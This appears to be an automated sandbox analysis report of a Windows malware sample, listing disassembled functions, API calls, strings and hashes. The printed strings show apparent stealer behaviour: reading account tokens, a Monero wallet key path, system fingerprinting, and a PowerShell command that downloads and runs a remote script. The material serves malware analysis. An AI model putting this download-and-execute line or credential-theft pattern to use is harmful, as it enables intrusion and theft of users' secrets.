                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 3073930149-1079375795
                    • Opcode ID: 8490720ec5494e58dad2468ed78b6902623de664aa42ef0feaf44a688d966781
                    • Instruction ID: 8b349ba6630c5a84d4919631cb095fd2e3d384b74774e7fe4c4b960573f107c5
                    • Opcode Fuzzy Hash: 8490720ec5494e58dad2468ed78b6902623de664aa42ef0feaf44a688d966781
                    • Instruction Fuzzy Hash: 29B14F7291060CABCB16EBA0DC96FEE7738AF14304F40411DF506EA191EF346E49DBA2
                    Function 003C6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$DefaultLangUser
                    • String ID: *
                    • API String ID: 1494266314-163128923
                    • Opcode ID: f9afa345c12018d2eae8d1ec2b603b5f23400d18394b99d0ac7edb34d965273b
                    • Instruction ID: a79ac0625bf06b943f8941eb23a973f99bbf764d110ce332375c1318bccb9d38
                    • Opcode Fuzzy Hash: f9afa345c12018d2eae8d1ec2b603b5f23400d18394b99d0ac7edb34d965273b
                    • Instruction Fuzzy Hash: 70F03A70905209EFD344AFE0A90AF3C7B74FB15702F040198E609C6290D6786A42EBD7
                    Function 003B4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003B4FCA
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003B4FD1
                    • InternetOpenA.WININET(003D0DDF,00000000,00000000,00000000,00000000), ref: 003B4FEA
                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 003B5011
                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 003B5041
                    • InternetCloseHandle.WININET(?), ref: 003B50B9
                    • InternetCloseHandle.WININET(?), ref: 003B50C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                    • String ID:
                    • API String ID: 3066467675-0
                    • Opcode ID: a544dbdc07966c80c60458226fd6cff2b59f95e09c9a37ca9f4cb405f0db1309
                    • Instruction ID: 6259746f4d44f974cf7354a5da91195850c6484d2b3fa0890cfae8b787a18b8f
                    • Opcode Fuzzy Hash: a544dbdc07966c80c60458226fd6cff2b59f95e09c9a37ca9f4cb405f0db1309
                    • Instruction Fuzzy Hash: CC3104F4A00218ABDB20DF54DC85BECB7B4EB48704F1081D9EB09A7281D7746E85DF99
                    Function 003C83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003C8426
                    • wsprintfA.USER32 ref: 003C8459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003C847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C8499
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                    • RegQueryValueExA.ADVAPI32(00000000,0118F550,00000000,000F003F,?,00000400), ref: 003C84EC
                    • lstrlen.KERNEL32(?), ref: 003C8501
                    • RegQueryValueExA.ADVAPI32(00000000,0118F538,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003D0B34), ref: 003C8599
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C8608
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C861A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                    • String ID: %s\%s
                    • API String ID: 3896182533-4073750446
                    • Opcode ID: 817c8640f7a3461a7dc5717c3fc23fb243e9ec87061811771982600a308b6b4e
                    • Instruction ID: c70d5beb1f4cedb2f641c68381e998d21180b193c8f935f36136821ecee6ad10
                    • Opcode Fuzzy Hash: 817c8640f7a3461a7dc5717c3fc23fb243e9ec87061811771982600a308b6b4e
                    • Instruction Fuzzy Hash: 6F2107B190021CABDB24DB54DC85FE9B3B8FB48700F00C199E609A6140DF75AE85CFD5
                    Function 003C7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C76A4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C76AB
                    • RegOpenKeyExA.ADVAPI32(80000002,0117B810,00000000,00020119,00000000), ref: 003C76DD
                    • RegQueryValueExA.ADVAPI32(00000000,0118F5B0,00000000,00000000,?,000000FF), ref: 003C76FE
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C7708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: Windows 11
                    • API String ID: 3225020163-2517555085
                    • Opcode ID: b497db51f70792eaa88b22fe8c34f5073883920e04588d228c3dfb8609a54ea2
                    • Instruction ID: ea2b0a26e58897f281ae0e947e730695a64ec4350a0d508d08704cb289aa3262
                    • Opcode Fuzzy Hash: b497db51f70792eaa88b22fe8c34f5073883920e04588d228c3dfb8609a54ea2
                    • Instruction Fuzzy Hash: 4E0144F5A44208BBD700DBE4DC49F79B7B8EB58701F104458FE08D7291D6B49904DF52
                    Function 003C7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7734
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C773B
                    • RegOpenKeyExA.ADVAPI32(80000002,0117B810,00000000,00020119,003C76B9), ref: 003C775B
                    • RegQueryValueExA.ADVAPI32(003C76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 003C777A
                    • RegCloseKey.ADVAPI32(003C76B9), ref: 003C7784
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: CurrentBuildNumber
                    • API String ID: 3225020163-1022791448
                    • Opcode ID: 53a41c90866e816f83022be59d95ef1cf843d63afd6d6fbff17b90e5bc52a9a2
                    • Instruction ID: d1c3a48c1d02e7ed2676f8490da3da317c29b4db69d1c358c65fd46f3afc253e
                    • Opcode Fuzzy Hash: 53a41c90866e816f83022be59d95ef1cf843d63afd6d6fbff17b90e5bc52a9a2
                    • Instruction Fuzzy Hash: B801F4F5A40308BBD700DBE4DC49FBEB7B8EB58705F104559FA09E7281D6B46A04DB52
                    Function 003C92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(:<,80000000,00000003,00000000,00000003,00000080,00000000,?,003C3AEE,?), ref: 003C92FC
                    • GetFileSizeEx.KERNEL32(000000FF,:<), ref: 003C9319
                    • CloseHandle.KERNEL32(000000FF), ref: 003C9327
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSize
                    • String ID: :<$:<
                    • API String ID: 1378416451-3602519871
                    • Opcode ID: bf632e79d7803aa5d97ed97156a55f01e0fbf6d4586aee1ff320fc3b220a7b61
                    • Instruction ID: c72d0dcd150087e7a7636330a3ebcbc2f555d59894d98e752ce3a3a416872c1b
                    • Opcode Fuzzy Hash: bf632e79d7803aa5d97ed97156a55f01e0fbf6d4586aee1ff320fc3b220a7b61
                    • Instruction Fuzzy Hash: CDF06978E00208ABDB10DBA0DC48FAE77B9EB58310F118658A615EB2C0E674AA019F41
                    Function 003B99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                    • LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                    • ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                    • LocalFree.KERNEL32(003B148F), ref: 003B9A90
                    • CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                    • String ID:
                    • API String ID: 2311089104-0
                    • Opcode ID: 859882abf5eb2d799d021389ce371f4b464c155afba2859eb5ba792637f72558
                    • Instruction ID: 773ac2a541669889e8f121242a5ee72838f2d82e3db1c1fa7db2aed3eebb0c3b
                    • Opcode Fuzzy Hash: 859882abf5eb2d799d021389ce371f4b464c155afba2859eb5ba792637f72558
                    • Instruction Fuzzy Hash: D3314AB4A00209EFDB11CF94C885FEE77B8FF48344F108159EA05A7290D778A945CFA1
                    Function 003C4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcat.KERNEL32(?,0118F790), ref: 003C47DB
                      • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 003C4801
                    • lstrcat.KERNEL32(?,?), ref: 003C4820
                    • lstrcat.KERNEL32(?,?), ref: 003C4834
                    • lstrcat.KERNEL32(?,0117A688), ref: 003C4847
                    • lstrcat.KERNEL32(?,?), ref: 003C485B
                    • lstrcat.KERNEL32(?,0118E6D0), ref: 003C486F
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003C8D90: GetFileAttributesA.KERNEL32(00000000,?,003B1B54,?,?,003D564C,?,?,003D0E1F), ref: 003C8D9F
                      • Part of subcall function 003C4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003C4580
                      • Part of subcall function 003C4570: RtlAllocateHeap.NTDLL(00000000), ref: 003C4587
                      • Part of subcall function 003C4570: wsprintfA.USER32 ref: 003C45A6
                      • Part of subcall function 003C4570: FindFirstFileA.KERNEL32(?,?), ref: 003C45BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                    • String ID:
                    • API String ID: 2540262943-0
                    • Opcode ID: 9b5bdccf638b4d49314775c46bd5f3c8c409f914950d2b0e980101c8c8b3549f
                    • Instruction ID: 24a7359c6c179f93f47c6698a11a5820c73afce746a8abcb13f9322e16690519
                    • Opcode Fuzzy Hash: 9b5bdccf638b4d49314775c46bd5f3c8c409f914950d2b0e980101c8c8b3549f
                    • Instruction Fuzzy Hash: 793143B690021857CB16F7B0DC85FE9737CAB58700F40498DB359EA081EEB59B89CB96
                    Function 003C2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 003C2D85
                    Strings
                    • ')", xrefs: 003C2CB3
                    • <, xrefs: 003C2D39
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 003C2CC4
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 003C2D04
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 3031569214-898575020
                    • Opcode ID: b452a3f3a233318b3e1ea3c401c9dea3fba60abdddf56c0a896aee19f741e9cd
                    • Instruction ID: 1baca096cccafe71e904b938fff64564023542f6a8f27384a31008c03ba9c909
                    • Opcode Fuzzy Hash: b452a3f3a233318b3e1ea3c401c9dea3fba60abdddf56c0a896aee19f741e9cd
                    • Instruction Fuzzy Hash: B141CC71C1060C9BDB1AEBA0D896FEDBB78AF10704F40411DE016EA191DF746E4ADF96
                    Function 003B9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                    Download Yara Rule
                    APIs
                    • LocalAlloc.KERNEL32(00000040,?), ref: 003B9F41
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
